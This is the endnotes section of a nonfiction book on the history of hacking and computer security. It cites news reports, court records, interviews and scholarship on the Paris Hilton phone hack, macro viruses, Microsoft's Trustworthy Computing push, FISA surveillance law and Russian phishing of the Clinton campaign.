“She was pretty upset”: John Schwartz, “Some Sympathy for Paris Hilton,” The New York Times, February 27, 2005.
“birth control kill pill”: Jessica, “The Collected Works of Paris Hilton’s Hacked Sidekick,” Gawker, February 21, 2005, gawker.com/033643/the-collected-works-of-paris-hiltons-hacked-sidekick.
changed their numbers: Jayfrankwilson, “Paris Hilton Phone Hack Exposes Nude Photos and Phone Numbers (2005),” Methodshop, June 2, 2020, methodshop.com/paris-hilton-phone-hack.
“A modern general-purpose”: Thomas Anderson and Michael Dahlin, Operating Systems: Principles and Practice, vol. 1, Kernels and Processes (West Lake Hills, TX: Recursive Books, 2011).
“Hello, world!”: The first example is from Brian Kernighan and Dennis M. Ritchie, The C Programming Language, 2nd edition (Englewood Cliffs, NJ: Prentice Hall, 1988), 8. The second example is from Charles Petzold, Programming Windows, 5th edition (Redmond, WA: Microsoft Press, 1999), 6. The second example differs from the first by printing “Hello, world!” in a text box.
commercial failures: Benj Edwards, “What Was IBM’s OS/2, and Why Did It Lose to Windows?,” How-To Geek, September 21, 2020, www.howtogeek.com/688970/what-was-ibms-os2-and-why-did-it-matter. Arguably, IBM’s was the technically superior operating system, featuring “preemptive multitasking,” which allowed multiple applications to run more smoothly.
Winner Take All market: Robert H. Frank and Philip Cook, The Winner-Take-All Society: Why the Few at the Top Get So Much More Than the Rest of Us (New York: Free Press, 1995).
desktop computing: See statcounter GlobalStats, “OS Market Share” for Desktop and Mobile, https://gs.statcounter.com/os-market-share. While Microsoft dominates the desktop with 75 percent, it barely registers in the mobile market at 0.02 percent.
market is “non-ergodic”: Paul A. David, “Clio and the Economics of QWERTY,” American Economic Review 75 (1985).
combined wealth of $250 billion: India Bureau, “Top 20 Richest People in the World: Some Interesting Facts About the List,” Business Insider India, April 6, 2022, https://www.businessinsider.in/finance/news/list-of-top-20-richest-people-in-the-world/articleshow/74475220.cms.
QWERTY typewriters: Tim McDonald, “Why We Can’t Give Up This Odd Way of Typing,” BBC Worklife, May 24, 2018, www.bbc.com/worklife/article/20180521-why-we-cant-give-up-this-odd-way-of-typing.
without a state’s consent: The free states were the strongest proponents of equal representation for each state in the Senate because the slave states, though small, were growing rapidly.
university website: Material from Kathy Rebello, “Inside Microsoft,” https://www.bloomberg.com/news/articles/1996-07-14/inside-microsoft. Sinofsky’s account: https://hardcoresoftware.learningbyshipping.com/p/024-discovering-cornell-is-wired.
“Cornell is WIRED!”: Bill Steele, “Gates Sees a Software-Driven Future Led by Computer Science,” Cornell Chronicle, March 4, 2004, news.cornell.edu/stories/2004/03/gates-sees-software-driven-future-led-computer-science. Gates contributed a new computer-science building to replace Upson Hall.
The World Wide Web: Tim Berners-Lee, Weaving the Web: The Original Design and Ultimate Destiny of the World Wide Web (New York: Harper Business, 2000).
experiencing explosive growth: “Share of the Population Using the Internet, 1990 to 1995,” Our World in Data, accessed June 2021, https://ourworldindata.org/grapher/share-of-individuals-using-the-internet?tab=chart&time=1990.1995&country=~USA.
PC-DOS: Bob Zeidman, “Did Bill Gates Steal the Heart of DOS?,” IEEE Spectrum: Technology, Engineering, and Science News, June 31, 2012, spectrum.ieee.org/computing/software/did-bill-gates-steal-the-heart-of-dos.
Microsoft followed suit: In 1988, Apple sued Microsoft and Hewlett Packard for copyright infringement, claiming that their graphical user interfaces were too similar to those of the Lisa and Macintosh operating systems. Xerox, in turn, sued Apple, claiming that Apple had infringed its copyright. Both Apple and Xerox lost in the district court. Apple lost on appeal. Apple Computer, Inc. v. Microsoft Corporation, 35 F.3d 1435 (9th Cir., 1994).
sales tripled: “The History of Microsoft: 1993,” https://docs.microsoft.com/en-us/shows/history/history-of-microsoft-1993.
Microsoft’s singular concern: Lance Ulanoff, “Remembering the Windows 95 Launch: A Triumph of Marketing,” Mashable, August 24, 2015, mashable.com/2015/08/24/remembering-windows-95-launch/?europe=true.
“bugging us about this”: Rebello, “Inside Microsoft,” Business Week; see Steven Sinofsky (@stevesi), “Telling the Untold Story in ‘Hardcore Software’ (inside the rise and fall of the PC revolution)…,” Twitter, May 30, 2021.
“I was a lonely voice”: Rebello, “Inside Microsoft,” Business Week.
compatible with Microsoft: Michael Calore, “April 22, 1993: Mosaic Browser Lights Up Web with Color, Creativity,” Wired, April 22, 2010, www.wired.com/2010/04/0422mosaic-web-browser.
ventured into cyberspace: Intrepid users dialed directly into the internet using early internet service providers. See “Ten Early ISPs and What Has Become of Them,” ISP.com blog, March 7, 2011, https://www.isp.com/blog/10-early-isps-and-what-has-become-of-them.
messages on public forums: Benj Edwards, “The Lost Civilization of Dial-Up Bulletin Board Systems,” The Atlantic, November 4, 2016, https://www.theatlantic.com/technology/archive/2016/11/the-lost-civilization-of-dial-up-bulletin-board-systems/506465/. On the role of BBSs as an introduction to hacking, Joseph Menn, Cult of the Dead Cow (New York: Public Affairs, 2019). See also Bruce Sterling, The Hacker Crackdown: Law and Disorder on the Electronic Frontier (New York: Bantam Books, 1992), 68–73.
known as newsgroups: Unlike bulletin boards, however, Usenet was designed to be a global system of news servers. Michael Hauben, Ronda Hauben, and Thomas Truscott, Netizens: On the History and Impact of Usenet and the Internet (Los Alamitos, CA: IEEE Computer Society Press, 1997), http://www.columbia.edu/~rh120/.
others sought: On the history of online services, see Brian McCullough, How the Internet Happened: From Netscape to the iPhone (New York: Liveright, 2018), 52–68.
$9.95 per month: Peter H. Lewis, “Personal Computers; An Atlas of Information Services,” The New York Times, November 1, 1994.
half of all CDs: M. G. Siegler, “How Much Did It Cost AOL to Send Us Those CDs in the 90s? ‘A Lot!,’ Says Steve Case,” Techcrunch, December 27, 2010, https://techcrunch.com/2010/12/27/aol-discs-90s/.
subscriber base: Mark Nollinger, “America, Online!,” Wired, September 1, 1995, https://www.wired.com/1995/09/aol-2/.
(FTP): In mid-1993, FTP accounted for the largest use of the backbone, 42.9 percent, as opposed to web traffic, which accounted for a mere 0.5 percent. See Matthew Gray, “Web Growth Summary,” http://www.mit.edu/people/mkgray/net/printable/web-growth-summary.html. Gray’s data is from the Merit Internet Backbone Report, but the link provided is broken. As a result, I could not confirm these numbers from the original source.
gated online services: Peter H. Lewis, “Business Technology: Prodigy Leads Its Peers onto the World Wide Web,” The New York Times, January 18, 1995.
different bets: Paul E. Ceruzzi, A History of Modern Computing, 2nd ed. (Cambridge, MA: MIT Press, 2002), 303.
the internet thus far: Tony Long, “Aug. 9, 1995: When the Future Looked Bright for Netscape,” Wired, August 9, 2007, www.wired.com/2007/08/aug-9-1995-when-the-future-looked-bright-for-netscape. Netscape’s 88 percent internet share was finally toppled by the Windows 95–Internet Explorer bundle.
explosion: Data from Matthew Gray, “Measuring the Growth of the Web: June 1993 to June 1995,” http://www.mit.edu/people/mkgray/growth/.
the business opportunity: Rebello, “Inside Microsoft.”
attempt to take on Netscape: Ben Slivka, “The Web Is the Next Platform, 5/27/1995,” Ben Slivka: My Thoughts on Your Future (blog), August 15, 2017, benslivka.com/2017/08/15/the-web-is-the-next-platform-5271995.
“A company like Siemens or Matsushita”: Slivka’s memo, 2.
“The Internet Tidal Wave”: Wired staff and Bill Gates, “May 26, 1995: Gates, Microsoft Jump on ‘Internet Tidal Wave,’” Wired, May 26, 2010, www.wired.com/2010/05/0526bill-gates-internet-memo.
Clinton Department of Justice: Complaint: U.S. v. Microsoft Corp, U.S. Department of Justice, May 18, 1998, www.justice.gov/atr/complaint-us-v-microsoft-corp.
Slate, a new web magazine: Microsoft, “Inaugural Issue of Slate, New Interactive Magazine from Microsoft and Editor Michael Kinsley, to Debut Online Today,” Stories, June 24, 1996, news.microsoft.com/1996/06/24/inaugural-issue-of-slate-new-interactive-magazine-from-microsoft-and-editor-michael-kinsley-to-debut-online-today.
do it for you: For examples of macros and how they are written: J. D. Sartain, “Word Macros: Four Examples to Automate Your Documents,” PCWorld, March 5, 2020, www.pcworld.com/article/2952126/word-macros-three-examples-to-automate-your-documents.html.
great destructive potential: Sarah Gordon, “What a (Winword.)Concept,” Virus Bulletin, September 1995, 8–9, https://www.virusbulletin.com/uploads/pdf/magazine/1995/199509.pdf; Sarah Gordon, “What Is Wild?,” 20th National Information Systems Security Conference, 1997, csrc.nist.gov/csrc/media/publications/conference-paper/1997/10/10/proceedings-of-the-20th-nissc-1997/documents/177.pdf.
Word would execute the virus: I am simplifying here. Winword.Concept contained several macros. The first was AutoOpen, which allows users to configure their Word documents. Because AutoOpen is designed to run any macro embedded within a Word document, AutoOpen first checks to see if another copy of it is running on the system. If there isn’t, it copies the second macro, FileSaveAs, to Normal.Dot, Word’s default template. Anytime users employ the File Save As command, Word uses the FileSaveAs macro in Normal.Dot. Winword.Concept also contained a Payload macro that is not only harmless but never executed.
“expect to see more of this type of virus”: Gordon, “What a (Winword.)Concept.”
Research must be conducted rigorously: See also Eugene Spafford, “Computer Viruses and Ethics,” Purdue Technical Report CSD-TR-91–061, 18: “Claiming that writing computer viruses is experimental is akin to saying that mixing chemicals together in a flask to see if it explodes is a scientific experiment.”
“virus writers of tomorrow”: “The Generic Virus Writer II,” www.vX-underground.org/archive/vXHeaven/lib/asg04.html. See also Spafford, “Computer Viruses,” 21: “We should make it clear to our peers, our students, and our employers. We need to make it clear that writing viruses is not done for ‘fun,’ and neither is it acceptable behavior.”
Melissa: Melissa was the name of the class module that held the macro. Peter Deegan, “The Not So Lovely Melissa,” ZDNET, March 27, 1999. Melissa source code is available here: https://www.cs.miami.edu/home/burt/learning/Csc521.061/notes/melissa.txt.
fifty contacts as well: Ian Whalley, “Melissa—the Little Virus That Could…,” Virus Bulletin, ed. Francesca Thorneloe, May 1999, 5–6, https://www.virusbulletin.com/virusbulletin/2015/06/throwback-thursday-melissa-little-virus-could-may-1999.
twenty months in federal prison: Smith pleaded guilty in December 1999. He was sentenced to twenty months in federal prison and fined $5,000 in May 2002. “Creator of Melissa Computer Virus Sentenced to 20 Months in Federal Prison,” press release, U.S. Department of Justice, May 1, 2002, www.justice.gov/archive/criminal/cyber-crime/press-releases/2002/melissaSent.htm.
“sneakernet”: Funny. Randall Munroe, “FedEx Bandwidth,” What If?–Xkcd, Spring 2012, what-if.xkcd.com/31.
voyage to the United States: Personal communication, Peter Radatti, June 10, 2021.
antivirus protection wasn’t very useful: As Vesselin Bontchev argued, users don’t run one another’s macros, so it made little sense to let users run untrusted macros. Macro viruses declined rapidly when Microsoft switched the default to executing only digitally signed macros: Vesselin Bontchev, “The Real Reason for the Decline of the Macro Virus,” Virus Bulletin, January 1, 2006, https://www.virusbulletin.com/virusbulletin/2006/01/real-reason-decline-macro-virus/.
repeatedly executed the virus: Nick FitzGerald, “Throwback Thursday: When Love Came to Town,” Virus Bulletin, ed. Martijn Grooten, June 2000, www.virusbulletin.com/virusbulletin/2015/05/throwback-thursday-when-love-came-town-june-2000. Two months after the virus was released, the Philippine Congress enacted Republic Act #8792, also known as the E-Commerce Act, which prohibited the release of viruses on the internet.
thought to top $10 billion: C. J. Robles, “ILOVEYOU Virus: 20 Years After the Malware Caused $10B Losses Worldwide,” Tech Times, May 3, 2020, www.techtimes.com/articles/249312/20200503/remembering-iloveyou-virus-20-years-after-the-destructive-virus-caused-10b-losses.htm.
several vulnerabilities: ILOVEYOU source code, https://github.com/onx/ILOVEYOU/blob/master/LOVE-LETTER-FOR-YOU.TXT.vbs. For a line-by-line analysis of the source code, see Radsoft, “ILOVEYOU: Line for line,” Radsoft.net, n.d., https://radsoft.net/news/roundups/luv/luv_src.shtml.
“There may have been”: Craig Timberg, “These Hackers Warned the Internet Would Become a Security Disaster. Nobody Listened,” The Washington Post, June 22, 2015.
Microsoft externalized costs: Unlike the vast and variegated PC hardware marketplace, Apple had an easier time coping with device drivers; it has a considerably smaller range of devices to manage.
by an Argentinean hacker: “Kournikova Computer Worm Hits Hard,” BBC News, February 13, 2001, http://news.bbc.co.uk/2/hi/science/nature/1167453.stm; Graham Cluley, “Memories of the Anna Kournikova Worm,” Naked Security, February 11, 2011.
White House web server: Carolyn Meinel, “Code Red: Worm Assault on the Web,” Scientific American, October 28, 2002.
clicked on the email attachment: “Beast,” https://en.wikipedia.org/wiki/Beast_(Trojan_horse). Beast is a remote administration tool (RAT).
cannot recover for lost wages: “The most general statement of the economic loss rule is that a person who suffers only pecuniary loss through the failure of another person to exercise reasonable care has no tort cause of action against that person.” Jay Feinman, “The Economic Loss Rule and Private Ordering,” Arizona Law Review 48: 813 (2006).
Congress made an exception: Computer Abuse Amendments Act of 1994, Public Law No. 103-322, 108 Stat. 2097.
Patriot Act: Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism (USA PATRIOT) Act of 2001, Public Law No. 107-56, 115 Stat. 272, Sec 814(e).
“warrant of merchantability”: “Where the seller at the time of contracting has reason to know any particular purpose for which the goods are required and that the buyer is relying on the seller’s skill or judgment to select or furnish suitable goods, there is unless excluded or modified under the next section an implied warranty that the goods shall be fit for such purpose.” UCC Article 2, Part 3, General Obligation and Construction of Contract §2-315. Implied Warranty: Fitness for Particular Purpose.
disclaim this warranty: UCC §2-316. Exclusion or Modification of Warranties.
sign anyway: David Berreby, “Click to Agree with What? No One Reads Terms of Service, Studies Confirm,” The Guardian, March 3, 2017.
“The broad issue is”: Steve Lohr, “Product Liability Lawsuits Are New Threat to Microsoft,” The New York Times, October 6, 2003.
fiber-optic internet cables: Fiber-optic cables are harder to tap underwater than traditional copper cables. Charles Savage, Power Wars: A Relentless Rise of Presidential Authority (New York: Back Bay, 2015), 173.
the “tubes”: “The internet is not something that you just dump something on, it’s not a big truck, it’s, it’s a series of tubes”: Alex Gangitano, “Flashback Friday: ‘A Series of Tubes’ Roll Call,” Roll Call, February 16, 2018, https://www.rollcall.com/2018/02/16/flashback-friday-a-series-of-tubes/.
leaked NSA documents: “ST-09–002 Working Draft,” draft NSA IG report, Office of the Inspector General, March 24, 2009.
collection on American soil: The Foreign Intelligence Surveillance Act defines “foreign intelligence” broadly: any matter that “relates to (A) the national defense or the security of the United States; or (B) the conduct of the foreign affairs of the United States”: 50 U.S. Code §1801(e)(2). According to Executive Order 12333, known as “12 Triple 3,” the NSA can hack anything it wants outside the United States, as long as it is not targeting an American citizen or permanent resident, known as a “US Person.” But hacking inside the country is domestic spying and is subject to strict controls. For the authority on all matters FISA, see David S. Kris and J. Douglas Wilson, National Security Investigations and Prosecutions 3d (Eagan, MN: Thomson-Reuters, 2019).
Foreign Intelligence Surveillance Act of 1978: Pub.L. 95–511, 92 Stat. 1783, 50 USC ch. 36.
they are nonetheless substantial: Instead of alleging probable cause that the target committed a crime, a FISA warrant must allege probable cause that the target is a foreign power or an agent of a foreign power who has foreign intelligence.
a single telephone call: “Warrantless Surveillance and the Foreign Intelligence Surveillance Act: The Role of Checks and Balances in Protecting Americans’ Privacy Rights (Part II),” Hearing before the Committee on the Judiciary of the House of Representatives, 110th Congress, 1st Session, September 18, 2007, https://www.govinfo.gov/content/pkg/CHRG-110hhrg37844/html/CHRG-110hhrg37844.htm. For skepticism over this figure, see 5.
a serious criminal offense: 18 U.S. Code §2511 4(a).
unworkable in the internet age: FISA permitted the NSA to intercept international radio signals within the United States without a warrant, on the theory that only foreign powers would use them to communicate with one another, 50 U.S. Code §1801(f)(3). Wiretapping domestic cables without a warrant, however, was expressly forbidden, on the pain of criminal penalties, because American citizens used those cables to make telephone calls.
without FISA warrants: The White House placed constraints on this warrantless surveillance: it could be done only if the communications were believed to be related to terrorism, the communications were coming from outside the country, and the target of this communication was not an American citizen.
Stellarwind: For background on Stellarwind, see Savage, Power Wars, 180–87.
“obnoxious court”: Jack Goldsmith, The Terror Presidency: Law and Judgment Inside the Bush Administration (New York: Norton, 2007), 181.
The Reagan White House: Savage, Power Wars, 174.
“In the past”: Bill Gates, “Bill Gates: Trustworthy Computing,” Wired, January 17, 2002, www.wired.com/2002/01/bill-gates-trustworthy-computing.
also pricey: Michael Howard and David Le Blanc, Writing Secure Code, 2nd ed. (Redmond, WA: Microsoft Press, 2003), 127.
Nimda worm: Roman Danyliw, Chad Dougherty, Allen Householder, and Robin Ruefle, 2001 CERT Advisories, CA-2001-26: Nimda Worm, original release date: September 18, 2001, https://resources.sei.cmu.edu/asset_files/WhitePaper/2001_019_001_496192.pdf.
“When I told friends”: Timberg, “These Hackers Warned.”
a screeching halt: Michael Howard and Steven Lipner, “Inside the Windows Security Push,” IEEE Security & Privacy 1 (January–February 2003): 57–61, www.computer.org/csdl/magazine/sp/2003/01/j1057/13rRUxlgxRG; Howard and Le Blanc, Writing Secure Code, xxiii.
turning these features off: When turned on, features should run with the least privileges necessary; in this way, a successful attacker would be able to exploit fewer privileges.
before the hackers could: Patrice Godefroid, “A Brief Introduction to Fuzzing and Why It’s an Important Tool for Developers,” Microsoft Research (blog), March 4, 2020, www.microsoft.com/en-us/research/blog/a-brief-introduction-to-fuzzing-and-why-its-an-important-tool-for-developers. Microsoft encourages all its third-party app developers to fuzz their software using a variety of techniques.
Windows free of charge: Microsoft, “Gates Highlights Progress on Security, Outlines Next Steps for Continued Innovation,” Stories, February 15, 2005, news.microsoft.com/2005/02/15/gates-highlights-progress-on-security-outlines-next-steps-for-continued-innovation.
Microsoft helped to halt: In addition to Defender, improvements in antivirus software, operating systems, firewalls, cloud computing, network scanning, and the phasing out of floppy disks all contributed to the eradication of viruses and worms.
It evolved: “First, while viruses were more common than worms initially, worms have become the predominant threat in recent years, coinciding with the growth of computer networking.” Thomas M. Chen and Jean-Marc Robert, “The Evolution of Viruses and Worms,” in Thomas H. Chen, ed., Statistical Methods in Computer Security (Boca Raton, FL: CRC Press, 2004).
for sophisticated cybercriminals: Low-level criminals usually buy off-the-shelf malware from the Dark Web or other cybercriminal forums.
Equally concerning were bad coders: Thomas Ball et al., “SLAM and Static Driver Verifier: Technology Transfer of Formal Methods inside Microsoft,” Technical Report MSR-TR-2004-08, January 28, 2004, https://www.microsoft.com/en-us/research/wp-content/uploads/2016/02/tr-2004-08.pdf. See also Thomas Ball, Vladimir Levin, and Sriram K. Rajamani, “A Decade of Software Model Checking with SLAM,” Communications of the ACM 54, no. 7 (July 2011): 68–76, https://cacm.acm.org/magazines/2011/7/109893-a-decade-of-software-model-checking-with-slam/fulltext.
distributing the driver: Thomas Ball et al., “The Static Driver Verifier Research Platform,” Microsoft, citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.187.9452&rep=rep1&type=pdf.
95 percent of the browser market: Raising concerns in the Justice Department about market dominance: https://www.justice.gov/atr/file/704876/download.
discontinued the browser in 2003: Stephen Lawson, “AOL to End Support for Netscape Browser,” Network World, December 28, 2007, www.networkworld.com/article/2281861/aol-to-end-support-for-netscape-browser.html. Netscape lasted until 2008 under the Mozilla Foundation name.
classics of Western philosophy: Jean-Jacques Rousseau, Discourse on the Origin of Inequality (Cambridge, MA: Hackett, 2010).
distinguish himself from others: According to Rousseau, natural man is born with amour de soi, which is a form of self-love that does not depend on other people’s opinions.
hunter-gatherer societies: See Azar Gat, War in Human Civilization (Oxford: Oxford University Press, 2008).
countercultural outsiders: See John Markoff, What the Dormouse Said: How the Sixties Counterculture Shaped the Personal Computer Industry (New York: Viking, 2005).
Congress updated FISA: The Protect America Act of 2007, Pub.L. 110–55, 121 Stat. 552; The FISA Amendments Act of 2008, Pub.L. 110–261, 122 Stat. 2437.
produce downcode securely: Many of the findings from the Windows Security Push were published in Howard and Le Blanc, Writing Secure Code.
as fast as they sprang up: Steve Hargreaves, “Paris Hilton Hacking Victim?,” CNN Money, May 2, 2005, money.cnn.com/2005/02/21/technology/personaltech/hilton_cellphone/?cnn=yes.
“evil maid” attack: Zidar mentioned T-Mobile’s investigation included the “possibility that someone had access to one of Ms. Hilton’s devices and/or knew her account password”: David Quinton, “T-Mobile Reacts to Hilton’s Sidekick Hack,” SC Media, February 22, 2005, https://www.scmagazine.com/home/security-news/t-mobile-reacts-to-hiltons-sidekick-hack/.
an attack called Bluesnarfing: John Markoff and Laura Holson, “An Oscar Surprise: Vulnerable Phones,” The New York Times, March 2, 2005.
Bluetooth technology: “Danger Hiptop 2 / Sidekick II,” Phone Scoop, https://www.phonescoop.com/phones/phone.php?p=560; Staci D. Kramer, “Paris Hilton: Hacked or Not?,” Wired, February 23, 2005, https://www.wired.com/2005/02/paris-hilton-hacked-or-not/.
Barack Obama admitted: Nick Statt, “Obama, Serious about Cybersecurity, Also Delivers Laughs,” CNET.com, February 13, 2015, https://www.cnet.com/news/privacy/obama-serious-about-cybersecurity-also-delivers-laughs.
Mark Zuckerberg’s Twitter: John Leyden, “Mark Zuckerberg’s Twitter and Pinterest Password Was ‘dadada,’” The Register, June 6, 2016, https://www.theregister.com/2016/06/06/facebook_zuckerberg_social_media_accnt_pwnage.
Kanye West’s pass code: Jason Parker, “Kanye West Meets with Trump, Reveals iPhone Passcode Is 000000,” CNET.com, October 11, 2018, https://www.cnet.com/culture/internet/kanye-west-meets-with-trump-reveals-iphone-passcode-is-000000.
favorite pet Chihuahua: Mike Masnick, “How Paris Hilton Got Hacked? Bad Password Protection,” Techdirt, February 22, 2005, www.techdirt.com/articles/20050222/2026239.shtml.
her phone number: Bruce K. Marshall, “Paris’s Password Reset Question Proves to Be a Poor Choice,” PasswordResearch.Com, February 19, 2005, passwordresearch.com/stories/story71.html.
Nicholas Jacobsen: Paul Roberts, “Paris Hilton May Be Victim of T-Mobile Web Holes,” Computerworld, March 1, 2005, www.computerworld.com/article/2569592/paris-hilton-may-be-victim-of-t-mobile-web-holes.html.
ongoing criminal investigations: Kevin Poulsen, “Hacker Breaches T-Mobile Systems, Reads US Secret Service Email and Downloads Candid Shots of Celebrities,” The Register, January 12, 2005, https://www.theregister.com/2005/01/12/hacker_penetrates_t-mobile/.
deliver its file to my browser: kingthorin, “SQL Injection,” OWASP, accessed June 8, 2021, owasp.org/www-community/attacks/SQL_Injection.
simple example: Example from Peter Yaworski, Real-World Bug Hunting: A Field Guide to Web Hacking (San Francisco: No Starch, 2019), 82–83.
the following code: The snippets here are using the PHP server-side scripting language.
“literally hundreds of injection vulnerabilities”: Paul Roberts, “Paris Hilton: Victim of T-Mobile’s Web Flaws?,” Ethical Hacking and Computer Forensics (blog), PCWorld, March 1, 2005, www.pcworld.com/article/119851/article.html.
inaccessible to the general public: Another of Krebs’s sources, Kelly Hallissey, who had befriended the hacking group of which Cameron was a member, confirmed that the teenager had indeed been the perpetrator. Brian Krebs, “Paris Hilton Hack Started with Old-Fashioned Con,” The Washington Post, May 19, 2005.
“Hip Hop Debs”: Nancy Jo Sales, “Hip Hop Debs,” Vanity Fair, September 1, 2000.
“Paris had a charisma”: Keaton Bell, “Paris Hilton on Her Revealing New Documentary: ‘I’m Not a Dumb Blonde. I’m Just Really Good at Pretending to Be One,’” Vogue, September 16, 2020, www.vogue.com/article/paris-hilton-talks-about-her-new-documentary.
huge ratings: Lisa de Moraes, “‘Simple Life,’ the Overalled Winner,” The Washington Post, September 5, 2003.
without a valid license: Steve Gorman, “Paris Hilton Sentenced to 45 days in Jail,” Reuters, May 4, 2007, https://www.reuters.com/article/us-hilton/paris-hilton-sentenced-to-45-days-in-jail-idUSN0339694420070505.
Confessions: Paris Hilton, Confessions of an Heiress: A Tongue-in-Chic Peek Behind the Pose (New York: Touchstone, 2006).
“Everything I’ve done”: 06afeher, “Paris, Not France,” YouTube, https://www.youtube.com/watch?v=zeV_59Lz5fk at 33:46.
Cameron was born: Telephone interview with Cameron LaCroix, March 18, 2022. (First interview with CL).
The representatives usually reset the password: Christopher Null, “Hackers Run Wild and Free on AOL,” Wired, February 21, 2003, www.wired.com/2003/02/hackers-run-wild-and-free-on-aol.
“I always had the feeling”: Kim Zetter, “Database Hackers Reveal Tactics,” Wired, May 25, 2005, www.wired.com/2005/05/database-hackers-reveal-tactics.
Cameron sent an email: “Massachusetts Teen Convicted for Hacking into Internet and Telephone Service Providers and Making Bomb Threats to High Schools in Massachusetts and Florida,” U.S. Department of Justice, September 8, 2005, www.justice.gov/archive/criminal/cybercrime/press-releases/2005/juvenileSentboston.htm.
The email read: According to Cameron, his friend wrote the email. First interview with CL.
larger-scale intrusions: Zetter, “Database Hackers Reveal.”
Snoop Dogg is standing: T-Mobile, “Paris Hilton-T-Mobile-Fabric Softener,” AdForum Talent, uploaded by Publicis Seattle, January 1, 2005, www.adforum.com/talent/62231-paris-hilton/work/46280.
Hackers are information junkies: Hackers are well-known for “dumpster diving,” searching through dumpsters or trash cans for information. See, e.g., Elizabeth Montalbano, “Hackers Dumpster Dive for Taxpayer Data in COVID-19 Relief Money Scams,” Threatpost, May 7, 2020, https://threatpost.com/hackers-dumpster-dive-covid-19-relief-scams/155537/. See also Michele Slatalla and Joshua Quittner, Masters of Deception: The Gang That Ruled Cyberspace (New York: Harper Perennial, 1995).
security information over the phone: Krebs, “Paris Hilton Hack Started.”
generous with session tokens: “Paris Hilton’s Phonebook Hacked, Posted Online (+ How It Could Have Been Done),” Rootsecure.Net, June 26, 2010, web.archive.org/web/20100626030043/http://www.rootsecure.net/?p=reports/paris_hilton_phonebook_hacked.
“a ticket on an ocean liner”: Scott Granneman, “How Shall I Own Your Mobile Phone Today?,” The Register, March 25, 2005, www.theregister.com/2005/03/25/mobile_phone_security.
messaging for multiple platforms: Jason Duaine Hahn, “The History of the Sidekick: The Coolest Smartphone of All Time,” Complex, September 22, 2020, www.complex.com/pop-culture/2015/09/history-of-the-sidekick.
high-tech jewelry: Hahn, “History of the Sidekick.”
stolen credit card information: First interview with CL.
mobile operating system market: Richard Shim, “Danger Tests Update to Device OS,” CNET, September 24, 2003, www.cnet.com/news/danger-tests-update-to-device-os.
“Web applications”: Krebs, “Paris Hilton Hack Started.”
Long Creek Youth Development Center: Telephone interview with Cameron LaCroix, September 26, 2022. (Second interview with CL.)
two years in prison: Commonwealth v. Cameron LaCroix, Defendant, Social Law Library, web.archive.org/web/20110716101406/http://www.sociallaw.com/slip.htm?cid=18798&sid=121.
fourteen thousand people: “Massachusetts Man Charged with Computer Hacking and Credit Card Theft,” U.S. Department of Justice, September 16, 2014, www.justice.gov/opa/pr/massachusetts-man-charged-computer-hacking-and-credit-card-theft.
“Just got sold to”: Dashiell Bennett, “Burger King’s Twitter Account Got Seriously Hacked,” The Atlantic, October 30, 2013, www.theatlantic.com/business/archive/2013/02/burger-kings-unfortunate-twitter-hack/318246.
sold to Cadillac: “Recidivist Hacker Sentenced for Violating Supervised Release,” U.S. Department of Justice, September 16, 2019, www.justice.gov/usao-ma/pr/recidivist-hacker-sentenced-violating-supervised-release-conditions.
Cameron expressed remorse: Milton J. Valencia, “Apologetic New Bedford Hacker Gets 4-Year Jail Sentence,” The Boston Globe, October 28, 2014, www.bostonglobe.com/metro/2014/10/27/new-bedford-computer-hacker-sentenced-years-federal-prison/XwXxwL0TGGfiLk9QimRQiM/story.html.
suggested by the guidelines: Transcript, Case 1:14-cr-10162-MLW, Document 53, Filed September 2, 2019, 9.
the Today show: NBC, “‘Paris, I’m Sorry,’ Says Cameron LaCroix: A Super-Hacker Interview,” YouTube, uploaded by z plus tv, November 6, 2014, www.youtube.com/watch?v=sggPiw43WCA.
he wrote in a public letter: Stephanie Merry, “Matt Lauer Breaks Silence: ‘To the People I Have Hurt, I Am Truly Sorry,’” The Washington Post, November 30, 2017.
he had two more to go: Transcript, Case 1:14-cr-10162-MLW.
Bill Barr announced: Attorney General William Barr, “Memorandum for the Director of Bureau Prisons,” March 26, 2020, https://www.bop.gov/coronavirus/docs/bop_memo_home_confinement.pdf; Ian MacDougall, “Bill Barr Promised to Release Prisoners Threatened by Coronavirus—Even as the Feds Secretly Made It Harder for Them to Get Out,” ProPublica, May 26, 2020, https://www.propublica.org/article/bill-barr-promised-to-release-prisoners-threatened-by-coronavirus-even-as-the-feds-secretly-made-it-harder-for-them-to-get-out.
managed to contact him: Second interview with CL.
to grant him access: US v. Cameron LaCroix, Defendant’s Assented-to Motion to Modify Conditions of Supervised Release, August 15, 2017.
Packingham v. North Carolina: Packingham v. North Carolina, 137 S. Ct. 1730 (2017).
His picture: See https://www.blueuprising.org/our-team.
As he awoke in his hotel: William Bastone, “Tracking the Hackers Who Hit DNC, Clinton,” The Smoking Gun, August 12, 2016, https://www.thesmokinggun.com/documents/investigation/tracking-russian-hackers-638295.
Glavnoye Razvedyvatelnoye Upravlenie: Usually translated as the Organization of the Main Intelligence Administration.
a red banner: Eric Lipton, David E. Sanger, and Scott Shane, “The Perfect Weapon: How Russian Cyberpower Invaded the United States,” The New York Times, December 13, 2016.
six out of ten targets: Secureworks Counter Threat Unit, “Threat Group-4127 Targets Hillary Clinton Presidential Campaign,” Secureworks, June 26, 2016, https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign. “CTU researchers identified … 26 personal gmail.com accounts belonging to individuals linked to the Hillary for America campaign, the DNC, or other aspects of U.S. national politics. TG-4127 created 150 short links targeting this group … As of this publication, 40 of the links have been clicked at least once.” Secureworks Counter Threat Unit, “Threat Group-4127 Targets Hillary Clinton Google Accounts,” Secureworks, June 16, 2016, https://www.secureworks.com/research/threat-group-4127-targets-google-accounts.
phishing: For a history of phishing, as told through research abstracts about phishing, see Ana Ferreira and Pedro Vieira-Marques, “Phishing Through Time: A Ten Year Story Based on Abstracts,” Proceedings of the 4th International Conference on Information Systems Security and Privacy 1 (2018): 225–32.
Linda is thirty-one years old: A. Tversky and D. Kahneman, “Judgments of and by Representativeness,” in Judgment under Uncertainty: Heuristics and Biases, ed. D. Kahneman, P. Slovic, and A. Tversky (Cambridge: Cambridge University Press, 1982); A. Tversky and D. Kahneman, “Extensional versus Intuitive Reasoning: The Conjunction Fallacy in Probability Judgment,” Psychological Review 90 (1983): 4; cf. Gerd Gigerenzer, “On Narrow Norms and Vague Heuristics: A Reply to Kahneman and Tversky.” Psychological Review 103 (1996): 592–96.
